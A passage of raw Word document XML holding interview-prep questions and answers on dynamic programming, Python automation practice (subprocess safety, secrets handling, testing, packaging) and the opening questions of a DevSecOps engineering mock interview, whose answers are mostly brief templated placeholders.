      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Practice problem: Find the minimum cost to climb stairs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/DP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use dynamic programming. dp[i] is the minimum cost to reach step i, and dp[i] = min(dp[i-1] + cost[i-1], dp[i-2] + cost[i-2]). Optimize space by keeping only the previous two values. Time O(n), space O(1). This is similar to climbing stairs but minimizes cost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Practice problem: Parse a log file and return the top N most frequent IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream the file line by line, extract IP addresses with split or regex depending on log format, and count with collections.Counter. Return counter.most_common(n). This avoids loading the full file into memory. Mention malformed lines, IPv6 support if needed, and memory concerns if cardinality is huge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How should you explain your approach, complexity, and test cases for a LeetCode or HackerRank-style Python problem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Interview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Clarify the problem, constraints, and edge cases. Explain brute force first if useful, then identify the pattern that improves it. Walk through the algorithm on a small example, code cleanly, test normal and edge cases, then state time and space complexity. If stuck, communicate hypotheses instead of going silent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 59 - Python Automation and Scripting Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design a Python automation script so it is safe, testable, reusable, and production-ready?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate core logic from CLI parsing, use functions/classes with clear inputs and outputs, add dry-run mode for risky operations, structured logging, config files/env vars, retries/timeouts, and clear exit codes. Make it idempotent where possible, write unit tests with mocks, and avoid hardcoded credentials or paths. Production automation should be boring, observable, and safe to rerun.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you write a Python script to scan a directory, find large or old files, and generate a cleanup report?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/File Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use pathlib or os.scandir to walk files, collect size, modified time, owner/path if needed, and filter by thresholds. Write a CSV/JSON report with recommended actions. Add dry-run by default, exclude patterns, symlink handling, permission-error handling, and logging. Only delete files with explicit confirmation or a separate approved cleanup mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you call a paginated REST API in Python, handle retries, and export the results to CSV?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/API Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use requests or httpx with timeout settings, loop through next-page tokens or page numbers, and retry transient 429/5xx failures with exponential backoff and jitter. Validate response shape, collect or stream records, and write CSV with the csv module. Store API tokens securely, log progress, and handle partial failures gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you automate a GCP resource inventory report using Python SDKs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Cloud Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Google Cloud client libraries or Cloud Asset Inventory to list projects and resources, collect metadata such as labels, region, owner, machine type, IAM bindings, and cost tags, then export CSV/JSON or write to BigQuery. Use service account least privilege, pagination, retries, and per-project error handling. Schedule it with Cloud Scheduler/Cloud Run or a CI job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you use Python to list Kubernetes pods across namespaces and report CrashLoopBackOff or Pending pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Kubernetes Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the official Kubernetes Python client, load kubeconfig or in-cluster config, list pods for all namespaces, and inspect pod.status.phase plus container_statuses waiting reasons. Report namespace, pod, container, reason, restart count, node, age, and recent events if possible. Add RBAC least privilege, timeouts, and output as table/CSV/JSON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you automate Terraform plan validation and summarize risky changes using Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Terraform Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run terraform plan with JSON output, parse the plan using json rather than text scraping, and summarize creates, updates, deletes, IAM changes, public network exposure, database changes, and replacements. Fail CI or require approval for risky patterns. Keep the script read-only, deterministic, and covered by tests using sample plan JSON files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. When would you use subprocess in Python, and how do you run shell commands safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Subprocess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use subprocess when a mature CLI already exists and there is no better SDK/API. Prefer subprocess.run with a list of arguments, shell=False, timeouts, check=True when appropriate, and captured output. Never concatenate untrusted input into shell commands. Log commands safely without secrets, handle return codes, and parse structured output like JSON when the CLI supports it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you speed up a Python automation job that checks hundreds of endpoints or servers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Concurrency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For I/O-bound checks, use asyncio with aiohttp/httpx async client or ThreadPoolExecutor with timeouts and bounded concurrency. Avoid unlimited parallelism because it can overload targets or hit rate limits. Add retries with backoff, per-host result collection, progress logging, and summary output. For CPU-bound work, use multiprocessing or move heavy computation elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What logging, error handling, exit codes, and dry-run behavior should a production automation script include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use structured logs with timestamp, operation, target, status, duration, and correlation/run ID. Catch expected errors and continue when safe, but fail fast for invalid config or dangerous states. Use exit code 0 for success, nonzero for failures, and separate partial-success reporting. Dry-run should show exactly what would change without changing anything.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you handle secrets, credentials, and sensitive output in Python automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Read secrets from Secret Manager, Vault, environment variables managed by CI, or workload identity. Do not hardcode them, print them, store them in reports, or pass them as CLI args. Redact known secret patterns from logs, scope credentials to least privilege, rotate regularly, and avoid writing sensitive API responses to local files unless encrypted and required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you build a Python CLI tool with arguments, subcommands, config files, and helpful output?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/CLI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use argparse, Click, or Typer. Define subcommands for different operations, validate arguments, support config files and env var overrides, and provide --dry-run, --verbose, --output json/csv/table, and useful help text. Keep CLI parsing thin and call reusable functions underneath so the logic is testable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you process a large CSV or JSONL file in Python without loading everything into memory?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Data Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream input line by line. For CSV, use csv.DictReader over the file object; for JSONL, parse one line at a time with json.loads. Write results incrementally and keep only required aggregates in memory. For very large grouping/sorting, use chunking, external storage, SQLite, pandas chunks, or BigQuery depending on scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How would you write a Python script that checks service health and sends Slack or email alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Monitoring Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Read service targets from config, check each endpoint with timeouts, validate status code and optional response content, and collect failures. Send a summarized alert to Slack/email with service, error, latency, and runbook link. Add retries to avoid flapping, rate limit alerts, structured logs, and a nonzero exit code if used in CI or cron.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you test Python automation code that calls cloud APIs, shell commands, and external services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate side-effecting adapters from core logic. Unit test core logic with sample inputs, mock cloud clients and subprocess calls, and use fixture files for API responses or Terraform plans. Add integration tests in a sandbox project when needed. Test failure paths, retries, dry-run behavior, malformed input, and permission errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How would you package and distribute an internal Python automation tool for a team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Packaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create a proper pyproject.toml package with console_scripts entry points, pinned dependencies, type hints, tests, and documentation. Publish to an internal package registry or distribute through a container image if environment consistency matters. Include versioning, changelog, examples, config templates, and CI that runs tests and security scans before release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Scenario: A manual weekly operations report takes four hours. How would you automate it end to end with Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Document the current manual steps, data sources, transformations, validations, and recipients. Build a Python job that fetches data through APIs/SQL/files, validates and cleans it, generates CSV/Excel/HTML output, and sends it by email or uploads it to a shared location. Schedule it, add logging, retries, audit trail, dry-run mode, and alerting when data is missing or report generation fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 60 - GT Bharat DevSecOps Specialist Engineering Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Walk me through your DevOps or DevSecOps experience and explain how it matches this GT Bharat Specialist Engineering role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Introduction/JD Fit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Introduction/JD Fit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your DevOps or DevSecOps experience and explain how it matches this GT Bharat Specialist Engineering role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What hands-on experience do you have with GCP and GKE, and how have you operated production workloads on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/GKE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/GKE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hands-on experience do you have with GCP and GKE, and how have you operated production workloads on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. A production pod in GKE is stuck in CrashLoopBackOff after a deployment. What exact steps and commands would you use to troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Troubleshooting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production pod in GKE is stuck in CrashLoopBackOff after a deployment. What exact steps and commands would you use to troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you design and maintain a highly scalable and resilient application platform on GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Resilience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Platform Resilience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and maintain a highly scalable and resilient application platform on GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. A RHEL/Linux server has high CPU, low disk space, and failing systemd services. How would you investigate and restore service health?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/System Administration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/System Administration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RHEL/Linux server has high CPU, low disk space, and failing systemd services. How would you investigate and restore service health?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. You are on-call during a major outage affecting a CSAT service. How would you lead detection, mitigation, communication, escalation, and RCA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Incident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are on-call during a major outage affecting a CSAT service. How would you lead detection, mitigation, communication, escalation, and RCA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you plan and execute production changes in a regulated enterprise environment while minimizing risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Change Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Change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plan and execute production changes in a regulated enterprise environment while minimizing risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Design a CI/CD pipeline using GitHub, JIRA, Jenkins, and Ansible for build, test, deployment, approvals, rollback, and auditability.</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CI/CD pipeline using GitHub, JIRA, Jenkins, and Ansible for build, test, deployment, approvals, rollback, and auditability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How have you used Terraform and Ansible together, and where would you draw the boundary between provisioning and configuration management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure as Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure as Code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used Terraform and Ansible together, and where would you draw the boundary between provisioning and configuration management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you implement secrets management with HashiCorp Vault or cloud secret managers for applications running in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Secrets Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
